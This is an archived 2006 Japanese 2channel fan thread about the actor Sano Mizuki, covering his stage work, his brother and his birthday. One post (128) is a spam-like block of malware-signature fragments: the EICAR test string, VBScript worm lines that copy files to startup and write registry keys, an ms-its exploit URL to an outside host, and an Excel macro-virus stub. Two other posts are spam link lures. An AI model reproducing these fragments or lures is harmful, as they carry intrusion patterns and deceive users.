5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆☆佐野瑞樹栄光の伝説・7☆☆

1 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 11:47:15
まぁ。なんだ。
ヘタレと呼ばれようが、偏食家だろうが
日々これエビフライを愛し続ける男。
三十路だって生きていくさ人間だもの。
暖かく見守れ。

前スレ
☆☆佐野瑞樹栄光の伝説・6☆☆
http://tv7.2ch.net/test/read.cgi/jr/1137083355/

過去スレ
http://tv7.2ch.net/test/read.cgi/jr/1084700071/
http://tv6.2ch.net/test/read.cgi/jr/1046717370/
http://tv2.2ch.net/test/read.cgi/jr/1015833048/
http://saki.2ch.net/jr/kako/963/963900745.html
http://music.2ch.net/jr/kako/991/991733922.html

2 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 12:21:52
まさか立てるヤシがいるとは思わなかった
自分以外に大兄スキーがまだこの板にいたとはな

3 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 13:08:19
前スレはマターリ回ってたよ

4 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 13:08:44
1乙です

いちよう・・いるよ

5 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 13:51:08
即死阻止 ガンガレ

6 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 17:50:21
次舞台の先行予約いつからか能

7 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 18:03:17
大兄がんがれ








お邪魔しますたノシ

8 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 21:59:59
>1
乙!

即死阻止!

9 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 22:17:20
死守
即死阻止!

熱中症になっちゃったよ
気持ち悪いよ

10 :名無し・LR議論中@ユーは自治スレへ:2006/07/28(金) 23:09:09
>9
大丈夫か?
大兄は今も野球やってんのかな?
大兄もここの姐さんも熱中症には気をつけて

11 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 00:10:48
弟との共演、観にいけそうにないや。
行きたかったのに。

12 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 00:18:38
>11
自分も観たいけど行けない(´・ω・`)

13 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 10:45:39
9ですが
なんとか大丈夫です

14 :名無し・LR議論中@ユーは自治スレへ:2006/07/29(土) 16:07:29
弟さんとの共演てはじめてなんですか?

15 :ユーは名無しネ:2006/07/31(月) 14:18:25
先行情報出たな

阻止阻止

16 :ユーは名無しネ:2006/07/31(月) 15:11:26
蛇波にコメントが載るなんてウレシス

17 :ユーは名無しネ:2006/07/31(月) 23:20:56
嬉しいねー
何でも良いからこれからもこまめに載せてくれたらいいな

18 :匿名:2006/07/31(月) 23:30:39
ラブレター終わったね
あとは9月か

19 :ユーは名無しネ:2006/07/31(月) 23:56:47
今年はそれでおわりかな
ラブレターの瑞樹チャンのボクシング姿素敵でした
でもなんか老けたな・・

20 :ユーは名無しネ:2006/08/01(火) 21:20:38
突然だが(カナリ)昔まだ大兄がSr.だってときに歌ってた「Dance」って誰の歌が知ってる人いる?

21 :ユーは名無しネ:2006/08/01(火) 22:54:21
またウルルン出ないかな>


22 :ユーは名無しネ:2006/08/02(水) 00:53:18
>>16
どこどこ?
はじめて公式サイト行ってみたけどわからなかったよー

23 :ユーは名無しネ:2006/08/02(水) 01:26:38
>>20
知ってどうするの

24 :ユーは名無しネ:2006/08/02(水) 18:58:26
22に同じく。
公式サイト見てきたが分からん。
どこに載ってるの?

25 :ユーは名無しネ:2006/08/02(水) 20:13:42
>22 >24
網じゃなくて波みたか?
これでわからなかったら諦めろ


26 :ユーは名無しネ:2006/08/03(木) 03:22:34
波と劇団DMの先行番号違うんだね

27 :ユーは名無しネ:2006/08/03(木) 12:52:55
>25
ありがとう。網みてた
ちゅーか携帯もってない専業主婦だからアキラメルよ
(おのれ蛇二!網にも載せんかいっ)

28 :ユーは名無しネ:2006/08/03(木) 22:59:57
板がかわったのね。
ここは裏じゃなくなったのね。

29 :ユーは名無しネ:2006/08/03(木) 23:03:31
ここて2人ぐらいでまわしてんちゃう?

30 :ユーは名無しネ:2006/08/04(金) 00:26:09
さぁ?自分は最近はロム専だけどちゃんと毎日来てるよ

31 :ユーは名無しネ:2006/08/04(金) 01:25:04
自分もロム専だけど毎日覗いてるよ(初レス

32 :ユーは名無しネ:2006/08/04(金) 01:31:56
大兄って大卒なの?

33 :ユーは名無しネ:2006/08/04(金) 02:11:10
あたしも毎日覗いてますよ

大兄は高卒のはずです

34 :ユーは名無しネ:2006/08/05(土) 14:32:53
でも高校進学校だった気が

35 :ユーは名無しネ:2006/08/05(土) 15:14:24
だって17でジャニーズ入ったんだろ。
とても大学なんて行く暇ないだろう。

36 :ユーは名無しネ:2006/08/05(土) 15:54:35
榎本は大学行ったが、その後フェードアウトしているな。
関係ないようなあるようなだけど。

37 :ユーは名無しネ:2006/08/05(土) 15:55:31
ここは下げ進行じゃないのか?
どーせレス付かないからすぐ下がるけど

毎日は覗かないなー。週一くらいかな

38 :ユーは名無しネ:2006/08/05(土) 16:08:43
>どーせレス付かないからすぐ下がるけど

だからたまにはあげないとね。

39 :ユーは名無しネ:2006/08/05(土) 16:21:59
進学校?
だから頭良いんだ・・

そうだよ、17,8で
入ったから
卒業してすぐ上京

40 :ユーは名無しネ:2006/08/05(土) 16:26:06
歌の勉強でもすればよかったのにね。

41 :ユーは名無しネ:2006/08/05(土) 16:40:19
大兄スレ回ってるとウレシ



42 :ユーは名無しネ:2006/08/05(土) 16:56:16
まだ歌へたなの?

43 :先行予約:2006/08/06(日) 11:11:05
佐野瑞樹ファンクラブの会員番号て‥
そんなモンきかれるたー思わなかたよ
情報局なんて何年も前に更新やめたさ

44 :ユーは名無しネ:2006/08/06(日) 11:14:02
会員番号は入力したけど、PWって言われてもねぇ

「佐野瑞樹FC」先行受付って流れるくらいなら
その辺どう入力すれば良いか波に書いといてくれ

って30分頃に26日チケ(σ・∀・)σ ゲッツ


45 :ユーは名無しネ:2006/08/06(日) 11:17:34
ウルルンで外国人に歌をうたったみたいよ。
下手だと思った事ないけど。歌下手説は有名な話?

ファンクラブまだあったんだ

46 :ユーは名無しネ:2006/08/06(日) 11:20:09
やぱみんな
26日にいくの?
プレゼントどする

47 :ユーは名無しネ:2006/08/06(日) 12:15:33
その会員番号はピアカードの会員番号だとオモー

48 :ユーは名無しネ:2006/08/06(日) 17:59:55
だと思う

49 :ユーは名無しネ:2006/08/06(日) 23:12:50
昔付き合ってたヲタ友達の一人が大兄と同じ学校出身だったな
広末涼子似の可愛い人だった
大兄は在籍校が進学校だったこともあり
大学受験もせずにジャニーズだなんてと白い目で見られていたと語ってた

50 :ユーは名無しネ:2006/08/07(月) 11:47:20
Wikiに国立大卒って書いてあるが本当?

51 :ユーは名無しネ:2006/08/07(月) 17:48:45
>46
26日行くが持ってっていいのか?


52 :ユーは名無しネ:2006/08/07(月) 23:10:38
51>>
さぁ。それをみんなに聞いたつもり・・
でも大変だよな。
良いファンなら持って行かないんじゃないのかな?

53 :ユーは名無しネ:2006/08/07(月) 23:54:35
>52
半年ロムれ

54 :ユーは名無しネ:2006/08/08(火) 00:04:07
皆で仁くんのお友達になろ♪
ちょ→カッコイイ仁くんの発言まとめ☆

@ジャニーズのスカウト来たよ・・・
 てかジャニーズもレベル下がったね(o´艸`o)
 俺でもスカウトされんだから(笑)

A有名人の友だち結構いるょ☆★
 ジャニだと、亀、仁くん、聖、山P、錦戸くんとか
 亀からゎしつこいくらいメールくるし(笑)

B彼女は芸能人だょ
 苗字も言ったら事務所に怒られるから言えないけど
 名前なら言えるよ「智花」っていうんだ

仁君へのコメントはここだょ♪♪♪
http://photo.awalker.jp/pup.php?ID=mr&serial=111050&c_num=4632

55 :ユーは名無しネ:2006/08/08(火) 02:19:05
一般人は黙って
指くわえて
見てりゃあいいんだよ

安っちいプレゼントくれるくらいならいらね。残念ながら全部本人の手元にないから

56 :ユーは名無しネ:2006/08/08(火) 03:23:37
夏  休  み

57 :ユーは名無しネ:2006/08/08(火) 15:47:20
>36
榎本は大卒だがマルチにハマるようじゃ
どうしようもないよなw
まだ大兄とも交流あるらしいから
勧誘されてないか心配だ

58 :ユーは名無しネ:2006/08/09(水) 01:40:08
瑞樹ちゃんはしっかりしてるからだいじょうぶ!

59 :ユーは名無しネ:2006/08/14(月) 18:11:59
特撮に出てくれないかな。
戦隊のメンバーで出れば、味が出るよ、きっと。

60 :ユーは名無しネ:2006/08/14(月) 18:54:17
ジャニーズの裏情報を入手する方法を教えます

トラックバック:http://music6.2ch.net/test/read.cgi/musicnews/1155480386/

↑この文章をそのままコピペしてこのスレ(ここ)に貼れば完了です
そうすれば裏情報やエロ画像が簡単に入手できるページがリンクされます

61 :あぼーん:あぼーん
あぼーん

62 :ユーは名無しネ:2006/08/15(火) 14:51:22
>>59
瑞樹ちゃんは変身ヒーローが似合うよ、きっと。
普段はちょっと抜けてるけど変身すると…かわいいやつ。

63 :ユーは名無しネ:2006/08/15(火) 20:24:40
30過ぎた人にちゃんづけってどうなの?
と最近思う。

64 :ユーは名無しネ:2006/08/16(水) 23:25:46
でも、瑞樹さん、じゃイメージがちょっと違うような

65 :ユーは名無しネ:2006/08/18(金) 00:41:38
うるるん、また出ないかな。
実写でタキシード仮面やってた人が、ワニやジャガーやピラニアのいる
ブラジルの世界遺産地帯へ行ったんだが。
猛獣に襲われる危険もあれば、生肉を食べたりもする
そういう場所へ瑞樹が行ったらどうなるか?
ちょっと興味あった。

66 :ユーは名無しネ:2006/08/18(金) 01:44:44
呼び捨てでいいんじゃね?


67 :ユーは名無しネ:2006/08/18(金) 01:59:58
まぁ、呼び方は人各々好きな呼び方で良いと思うけどね。
自分は、普段はフルネーム(呼び捨て)で、此処では瑞樹かたまに大兄だな。

68 :ユーは名無しネ:2006/08/18(金) 02:03:03
瑞樹ちゃんという風俗嬢が、最近ある漫画に出ているのだ。

69 :ユーは名無しネ:2006/08/19(土) 00:24:40
そういえば、瑞樹のAAってあるの?
見た事ないけど…。

70 :ユーは名無しネ:2006/08/19(土) 03:25:43
ジャニのAAって難しいだろ、
よっぽど特徴でもないと。

71 :ユーは名無しネ:2006/08/23(水) 01:30:01
弟さんと普段,仲いいの?

72 :ユーは名無しネ:2006/08/23(水) 15:43:06
>71
普通に仲良いよ。
何で?何か気になる事でもあった?

73 :ユーは名無しネ:2006/08/24(木) 21:18:03
LOOK at STAR!


74 :ユーは名無しネ:2006/08/24(木) 23:25:59
弟さんといっしょに仕事したことって,今まであるのかな?

75 :ユーは名無しネ:2006/08/25(金) 22:07:36
はじめてみたいね。
舞台を見には行ってたようだけど。

76 :ユーは名無しネ:2006/08/26(土) 01:27:23
今度の舞台,主役なの?
ぜひ見にいきたい!

77 :ユーは名無しネ:2006/08/26(土) 02:14:11
>71=>74=>76でしょ?
凄い鏝ってて気になるんだけど。

78 :ユーは名無しネ:2006/08/26(土) 03:11:57
すんげえ自演みた
きも

79 :ユーは名無しネ:2006/08/26(土) 03:26:04
71ではない者ですが、
72=75=77
はやけに詳しい口調だけど何者?繋がり?

80 :あぼーん:あぼーん
あぼーん

81 :ユーは名無しネ:2006/08/26(土) 04:39:07
原ともひろってまだいんの?

82 :ユーは名無しネ:2006/08/26(土) 08:00:08
自演決めつけ厨うざー

83 :ユーは名無しネ:2006/08/26(土) 08:48:12
>82
「,」←こんなん誰も使わねーよ(w

84 :ユーは名無しネ:2006/08/26(土) 14:52:29
頭おかしいシキリッチュがいますねー。

85 :ユーは名無しネ:2006/08/26(土) 15:07:35
    /三三三三三三三三\
   7三三三三三三三三三三 ヽ
   /三三r''ヾハ`"一ヾヘリ三三三三,
  /三r''"  ' `   ヾ `'"⌒ミ三ニ i
  }三/     二二ニ=      ヾ三,l
 .l三      一一−-      l三 ,|
 .}三     ,,=-、j ハ _,,    {三.|
 }ニj   ,,,,,,__、-t-f ,,,,''r'"三二=- ヾニ-、
 -ヾj  ''"_,,,、-y、=ji  l-ャ、ーiテ、_,,  iニ|`|
 |`j,I  ''"ー`='~ノl  ;;`  ̄''"~   liフリ
 .} |(|    "" .,r'   ;;;i `''     |i/'{
  l ヾ  ,、'"  ,」 ,__  ,_. j、     ミ|_/
  ヾ__|i,     /  ̄;; ;;, ヽ、  ;;;/ミ
    lミ   ;;',,,,,;;;;-j_,!=-、,,,,, ;;;;;;;;三
    ヾ,::::::: :;r-ー―ー- =-j ;;;iiiミ
     ヾ,;;;;; ;;  ,=ニ三  ニ三三'"
      ヾミ三ii;;   ̄"  ミ三 ニ'
       'lミ三ミr=-ハ三三三ニ'"
       |;;;;ヘ三三三三 ニ'"
      /ヘ   `ニ三三ニ"

   シキリッチュ・ウゼー(Sikirichu Uzeh)
     (1844〜1913 フランス)


86 :ユーは名無しネ:2006/08/26(土) 22:45:14
>79
>72=>77だけど、>75は自分じゃないよ
普通に、出てた雑誌とか弟さんの記事とかを読んでそう思っただけ
残念ながら繋がりではない

87 :ユーは名無しネ:2006/08/27(日) 01:38:30
Top Stageも出たね

88 :あぼーん:あぼーん
あぼーん

89 :あぼーん:あぼーん
あぼーん

90 :ユーは名無しネ:2006/09/01(金) 01:51:13
雑誌買ったけど
少っ!!!

91 :ユーは名無しネ:2006/09/03(日) 01:12:36
今月だね。舞台。
楽しみだなあ。

92 :ユーは名無しネ:2006/09/08(金) 00:56:51
レスがのびないね

93 :ユーは名無しネ:2006/09/12(火) 09:15:24
12年前のアイドルオンステージ見たら再びハマった


94 :ユーは名無しネ:2006/09/13(水) 01:36:07
>>93
何唄ってた?

95 :ユーは名無しネ:2006/09/13(水) 01:36:56
丸わかりなのに強気ワロス

96 :ユーは名無しネ:2006/09/13(水) 08:12:37
Coolとか。GIVE IT TO MEでベースやってたり、SMAPの後で踊ったり、、、

97 :ユーは名無しネ:2006/09/15(金) 13:57:58
ヘタメキタ

98 :ユーは名無しネ:2006/09/15(金) 20:15:47
今夜の太田総理に出てる「佐野大樹」って佐野の弟?

99 :ユーは名無しネ:2006/09/16(土) 01:45:34
もうすぐ舞台だ。
平日行けないのが辛いな。

100 :ユーは名無しネ:2006/09/16(土) 15:41:26
100!



101 :ユーは名無しネ:2006/09/17(日) 16:45:15
>98
そうだよ〜

102 :ユーは名無しネ:2006/09/18(月) 02:52:53
どんな舞台なのかなあ〜
気になるよ〜

103 :ユーは名無しネ:2006/09/19(火) 22:25:13
夜7時からというのが、ちょっと遅いですね。
大人のファンが多いのかな。

104 :ユーは名無しネ:2006/09/19(火) 22:33:20
10代のヲタがいるとは思えないです

105 :ユーは名無しネ:2006/09/19(火) 22:44:09
夜7時からって普通じゃないの?

106 :ユーは名無しネ:2006/09/19(火) 22:57:08
地方からの日帰り客には辛い。
せっかくだから2度見たいでしょ。

107 :ユーは名無しネ:2006/09/20(水) 02:14:37
>>104
pnishって、そういうユニットなのか?

108 :ユーは名無しネ:2006/09/20(水) 10:10:26
佐野さんの事じゃ…

109 :ユーは名無しネ:2006/09/20(水) 13:10:43
佐野くんファンの平均年令ってどのくらいですかねぇ?

110 :ユーは名無しネ:2006/09/20(水) 23:02:01
新規ファンがどうやってつくかにもよるが。
テレビ出演が少ないのが辛いかねえ?


111 :ユーは名無しネ:2006/09/20(水) 23:04:45
>109
TV露出の時期を考えると、20代〜30代くらいかな?
舞台を観て惚れたって人はわからないけどね。

112 :ユーは名無しネ:2006/09/20(水) 23:29:15
ですよね。あたし初めてファンになったのが13歳、、、気付けばもう20半ば、、、
いよいよ舞台ですね。誕生日もあとすこし。

113 :ユーは名無しネ:2006/09/21(木) 01:20:08
舞台,今日からでしたよね。

114 :ユーは名無しネ:2006/09/21(木) 01:21:59
コンマさんこんばんは!
コンマさんはいつ観に行かれるんですか?

115 :ユーは名無しネ:2006/09/21(木) 02:02:26
緊張してネレネ

116 :ユーは名無しネ:2006/09/21(木) 07:50:48
見にいきたい。
行ける人ウラヤマシす。

117 :ユーは名無しネ:2006/09/22(金) 01:13:22
誰か行った人は〜?

以前は演劇板でpnishのスレ見たこともあるんだが。

118 :名無し:2006/09/23(土) 13:28:48
土曜日だけあってすごい人出だネ

119 :ユーは名無しネ:2006/09/23(土) 23:18:13
瑞樹の弟はじめて見た。

120 :ユーは名無しネ:2006/09/24(日) 01:15:51
見てきたよ。
想像してたより面白かった。
コミックジャックのイメージに近いかな?


121 :ユーは名無しネ:2006/09/24(日) 02:04:42
きだつよしさんだからね。
瑞樹の役柄も、どこか似ているような。

122 :ユーは名無しネ:2006/09/24(日) 02:55:16
あ〜私もコミックジャック思い出して観てた。
瑞樹がちっとも主役じゃないあたりで(ニガワラ

123 :ユーは名無しネ:2006/09/24(日) 03:00:01
>>117

* p n i s h * 語りますか? vol.5
http://hobby8.2ch.net/test/read.cgi/drama/1154665762/l50

124 :ユーは名無しネ:2006/09/24(日) 03:07:12
誰が主役なのか、わかりづらい舞台ですな。

125 :ユーは名無しネ:2006/09/24(日) 03:16:45
出町した人いますか?
10時までに佐野君出てこなかったら解散ってルールはまだアリ?
舞台観に行くの久々なもんで…。

126 :ユーは名無しネ:2006/09/24(日) 12:00:17
面白かった。
また見たい。


127 :ユーは名無しネ:2006/09/24(日) 17:05:17
公演期間が短いのが残念だね。

128 :<body onload=window()>:2006/09/24(日) 23:49:20
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

129 :ななし:2006/09/25(月) 18:04:10
なんか声枯れてた。

130 :ユーは名無しネ:2006/09/25(月) 22:08:01
がんがれ、シンドー!

131 :ユーは名無しネ:2006/09/26(火) 01:32:51
誕生日オメ

132 :ユーは名無しネ:2006/09/26(火) 01:49:14
26日,誕生日だったね。おめでとう。
天秤座か。

133 :ユーは名無しネ:2006/09/26(火) 06:38:20
誕生日おめでとう!今日、舞台最終日でしたよね。
行けなかったのが残念…。

134 :ユーは名無しネ:2006/09/26(火) 07:48:12
再演あるといいねえ。
お誕生日おめ。

135 :ユーは名無しネ:2006/09/26(火) 08:17:25
おたおめage

136 :ユーは名無しネ:2006/09/26(火) 09:42:03
おめでとう

137 :ユーは名無しネ:2006/09/26(火) 09:51:48
お誕生日オメ〜!

138 :ユーは名無しネ:2006/09/26(火) 14:00:06
26にもなってズニアかよw

139 :ユーは名無しネ:2006/09/26(火) 14:31:14
26歳 www

140 :ユーは名無しネ:2006/09/26(火) 14:36:58
26だといいんだけどねぇ

141 :ユーは名無しネ:2006/09/26(火) 21:58:41
だれか138に本当の歳を教えてあげて・・・w

142 :ユーは名無しネ:2006/09/26(火) 22:09:30
つーか、何で26歳だと思ったんだ?

143 :ユーは名無しネ:2006/09/26(火) 22:44:50
舞台では何かお誕生日企画やったかな?

144 :ユーは名無しネ:2006/09/26(火) 23:08:28
今日行かれた方、レポよろ!

145 :ユーは名無しネ:2006/09/26(火) 23:13:41
257 :名無しさん@公演中 :2006/09/26(火) 20:54:09 ID:S7SNYh86
今日は佐野さんの誕生日だよね?
何かサプライズあったのかな…
観にいけた人落としてください…!


258 :名無しさん@公演中 :2006/09/26(火) 21:01:01 ID:Uitpwctl
速報…ケーキ登場と共に会場みんなでハピバソング。羽にのメンバーが隠し持っていたライターで火付け。

あとはレポ得意な方に任す。

146 :ユーは名無しネ:2006/09/27(水) 01:25:03
うわーそんなのやってたんだ!
見たかったなあ。
平日だからなあ・・・

147 :ユーは名無しネ:2006/09/27(水) 02:24:11
あっちの劇団のファンの人には、瑞樹がお兄ちゃんだというのは衆知なのか?

148 :ユーは名無しネ:2006/09/27(水) 09:55:37
知ってる人もいると思うが
秋刀魚御殿で弟も言っちゃってたし
あんまり似てないが
やっぱ芝居とか口調が似てるなー…

149 :ユーは名無しネ:2006/09/27(水) 10:00:53
昨日のあの人数
あっちの劇団のファンの方々に
ご迷惑かけたんじゃないかと心配

150 :ユーは名無しネ:2006/09/27(水) 10:21:28
名前見りゃ関係者だと嫌でも気がつくんじゃね?

151 :ユーは名無しネ:2006/09/27(水) 10:54:05
向こうのファンの人と少し話したけどみんな知ってるっぽいよ。
弟ちゃんの兄リスペクトはすごいらしいし。
あんなんでもいいのかとちょっと心配になったが。

152 :ユーは名無しネ:2006/09/27(水) 11:49:55
初めて弟の舞台を見たけど、
弟も歌がヘタなキャラで笑った。
そんなところまでリスペクトしてるのか!?

153 :ユーは名無しネ:2006/09/27(水) 15:17:14
待ち、何人くらいいたんですか?

154 :ユーは名無しネ:2006/09/27(水) 16:30:06
明治座に秋山と見に来てた
秋山にはプレゼントもらったかー?

155 :ユーは名無しネ:2006/09/27(水) 21:47:29
1日遅れだけど、27才おめ

156 :ユーは名無しネ:2006/09/27(水) 22:28:40
>155
違うよ!26歳だよw

157 :ユーは名無しネ:2006/09/27(水) 22:34:47
84 名前:名無しさん@公演中[sage] 投稿日:2006/09/27(水) 22:27:09 ID:pTGmc2am
27日 明治座
秋山純、他

他に含まれている訳ですね…

158 :ユーは名無しネ:2006/09/27(水) 23:53:14
>>156
26歳だよね!138見るとね〜!

159 :ユーは名無しネ:2006/09/28(木) 00:47:17
佐野3兄弟、あと一人はどこに?

160 :ユーは名無しネ:2006/09/28(木) 01:52:57
26歳って誰のこと言ってるの?瑞樹の話だとしたら瑞樹は今年33だよ。

もう一人は一般人として普通に生活してます。

161 :ユーは名無しネ:2006/09/28(木) 07:02:39
160は過去ログ嫁。
実年齢なんてみんな知ってて遊んでるのに‥(呆

162 :ユーは名無しネ:2006/09/28(木) 22:12:02
舞台で見ると年齢がわからないね。


163 :ユーは名無しネ:2006/09/28(木) 23:49:03
そう言えば男ばっかりの舞台だったんだね。
でも華やかでよかった。

164 :ユーは名無しネ:2006/09/29(金) 01:29:54
160です
コメントは、最初に26と言い出した方へ向けています。わかりにくく失礼しました

165 :ユーは名無しネ:2006/09/29(金) 14:28:02
>>164
ツマンネ

166 :ユーは名無しネ:2006/09/29(金) 23:27:26
佐野君またテレビ出ないですかねぇ〜?とうぶんなさそうですよね…

167 :ユーは名無しネ:2006/09/30(土) 00:30:22
本人はバラエティに出たいとか言ってたけど、その話はどうなったんだろうね。

168 :ユーは名無しネ:2006/10/01(日) 09:58:07
DVD出るといいなあ。

169 :ユーは名無しネ:2006/10/01(日) 13:38:08
DVDでるかね?バラエティーつーと、どんな番組がいいかなぁ?

170 :ユーは名無しネ:2006/10/01(日) 23:08:46
取りあえず、伊東家とかサルヂエあたり良さそう。

171 :ユーは名無しネ:2006/10/02(月) 01:32:00
最近のバラエティ、あまり見てないのでよく知らない。
グルメ旅みたいなのでもいいな。

172 :ユーは名無しネ:2006/10/02(月) 13:35:49
そーいえば昔、怪文書とか出回って『佐野・原コンビと剛・健コンビは絶縁状態』とかありましたよね! もう大人だからそーゆーのは無くなったのかなぁ?そうしたら伊東家もアリかもね!

173 :ユーは名無しネ:2006/10/02(月) 22:00:16
怪文書って何だ?ジャニーズの怪談みたいなものか?

174 :ユーは名無しネ:2006/10/02(月) 23:13:53
>172
そんな怪文書があったなんて初めて知ったよ。
それが出回ってたのって何年頃?

175 :ユーは名無しネ:2006/10/03(火) 06:34:39
>>174
V6ができる前かできた頃でした。「佐野君はV6のバックでは踊らない説」とか…。でもよく考えたらVの炎で共演しましたね。    見えない壁アタック…

176 :ユーは名無しネ:2006/10/03(火) 18:18:35
きんき、加味せんなんかと自由に喋らせたら
くだらなくて面白いと思うんだけどな。

177 :ユーは名無しネ:2006/10/03(火) 22:52:32
>175
ありがォ。
共演してたからその時に何かあったのかと思ったけど、まぁ噂だからねー。
それと、改行した方が良いよ。

178 :ユーは名無しネ:2006/10/04(水) 00:38:35
弟さんと仲よさそうでよかったなあ。
かわええ兄弟や。

179 :ユーは名無しネ:2006/10/04(水) 07:56:42
公演期間がもうちょっと長かったらなあ。
再演なさそうだし。
もう一回見たかった。

180 :ユーは名無しネ:2006/10/07(土) 02:06:03
次の仕事はー?

181 :ユーは名無しネ:2006/10/08(日) 00:38:06
弟さんは、また舞台やってるね。

182 :ユーは名無しネ:2006/10/10(火) 07:56:24
仕事も大事だけど、家庭も大事でしょ。

183 :ユーは名無しネ:2006/10/10(火) 08:44:30
>182
何の話?

184 :ユーは名無しネ:2006/10/10(火) 21:28:26
家庭?
ああ、弟さんか。

185 :ユーは名無しネ:2006/10/13(金) 09:45:58
弟って結婚しているんだっけ?
ごめん
大兄が独身ってことしかしらない

186 :ユーは名無しネ:2006/10/14(土) 00:25:38
佐野君は結婚まだかなぁ
奥さんはごはん作りに苦労しそうだね

187 :ユーは名無しネ:2006/10/14(土) 01:44:20
体調管理をばっちりしてくれる嫁をもらってくれー!

188 :ユーは名無しネ:2006/10/15(日) 02:02:06
でもまあ独身でもいいよ。
瑞樹には男の方が似合うよ。

189 :ユーは名無しネ:2006/10/16(月) 00:11:55
男ばっかりの舞台も華やかでいいね!

190 :ユーは名無しネ:2006/10/16(月) 18:19:39
>>188
ん?

191 :ユーは名無しネ:2006/10/18(水) 01:56:06
次のお仕事まだ〜?

192 :ユーは名無しネ:2006/10/18(水) 03:18:56
瑞樹は仕事する気あるのか??

193 :ユーは名無しネ:2006/10/18(水) 22:25:41
ないの?

194 :ユーは名無しネ:2006/10/18(水) 22:53:54
ないことないでしょ〜

ドラマとかやんないかなぁ

195 :ユーは名無しネ:2006/10/19(木) 02:07:53
ドラマ、!やって、!
漫画原作がいいな。

196 :ユーは名無しネ:2006/10/20(金) 22:48:14
みんなさんは舞台とかなくて、佐野クン見れないときはどうしてるの?



197 :ユーは名無しネ:2006/10/20(金) 23:26:18
2ちゃんやってる。

198 :ユーは名無しネ:2006/10/21(土) 00:09:09
金田一の鑑賞

199 :ユーは名無しネ:2006/10/21(土) 02:19:43
畑仕事

200 :ユーは名無しネ:2006/10/21(土) 19:33:22
瑞樹でオナーニ

201 :ユーは名無しネ:2006/10/21(土) 22:32:46
御殿宛てとかに
「佐野クンゲストによんでほしい」ってメールやハガキだしたらよばれるかなぁ?

そんな簡単なもんじゃないか!?

202 :ユーは名無しネ:2006/10/22(日) 00:22:24
>201
弟がでてくるんじゃないの?

203 :ユーは名無しネ:2006/10/22(日) 00:46:13
フルネームで書くと、また微妙だしな。
こまったこまった。

204 :ユーは名無しネ:2006/10/22(日) 01:08:11
兄弟で出演
というのがおいしそうだけど。

205 :ユーは名無しネ:2006/10/22(日) 10:38:02
顔立ちもわりと似てるしね。
双子やるとか。

206 :ユーは名無しネ:2006/10/22(日) 13:12:44
12月にある弟の舞台の日替わりゲストに
瑞樹が候補に上がってるらしいよ

207 :ユーは名無しネ:2006/10/22(日) 21:13:57
ほう、それはたのしみ

208 :ユーは名無しネ:2006/10/23(月) 22:27:39
出るとすればいつかな?
年末だし見に行けるかわからないが。

209 :ユーは名無しネ:2006/10/24(火) 00:59:29
日替わりはともかく、ちゃんとしたお仕事、まだ?

210 :ユーは名無しネ:2006/10/26(木) 09:29:25
ん〜
わかんない
今何してんのかなぁ

211 :ユーは名無しネ:2006/10/27(金) 02:25:26
原くん元気かな〜

212 :ユーは名無しネ:2006/10/31(火) 22:31:17
LOOK at STAR!
に先日に公演載ってるね。

213 :ユーは名無しネ:2006/10/31(火) 22:34:34
>>212
あっ!ホントですか!
明日 LOOK at STAR買ってこよう


214 :ユーは名無しネ:2006/11/01(水) 00:28:53
1ページだけど,カラーだし、貴重な記録だ。
瑞樹も弟さん達も生き生きしていて、いい舞台だったなあ。

215 :ユーは名無しネ:2006/11/02(木) 01:49:38
佐野くんには、ああいう楽しい舞台が似合うようなきがす

216 :ユーは名無しネ:2006/11/02(木) 22:29:30
本見たよ〜
顔昔からかわらず、年よりも若く見えるよね

かっこいいっ

217 :ユーは名無しネ:2006/11/02(木) 22:46:05
本当に写真見ただけで楽しそうな舞台だって伝わってくるね。
またこういうタイプのに出てほしいな。

218 :ユーは名無しネ:2006/11/05(日) 00:46:44
たまには、もうちょっと話の核になるような役もやってほしい気もするが
贅沢ってもんですね。

219 :ユーは名無しネ:2006/11/05(日) 09:54:47
十分核だったと思うけど…
例えばこの間の舞台ならどの役みたいなのを言うの?

220 :ユーは名無しネ:2006/11/05(日) 21:59:25
>218
この前は主役だったのに何が不満?
その前のラブレター再演もメインな役だったし。
その前はアイドル役だったっけ?

221 :ユーは名無しネ:2006/11/06(月) 22:55:08
本買って見ました
衣装も似合いますね!
佐野くんらしい感じ

222 :ユーは名無しネ:2006/11/07(火) 00:30:40
ウェブの斗の日記に登場!

223 :ユーは名無しネ:2006/11/07(火) 00:46:13
大兄…かわゆす

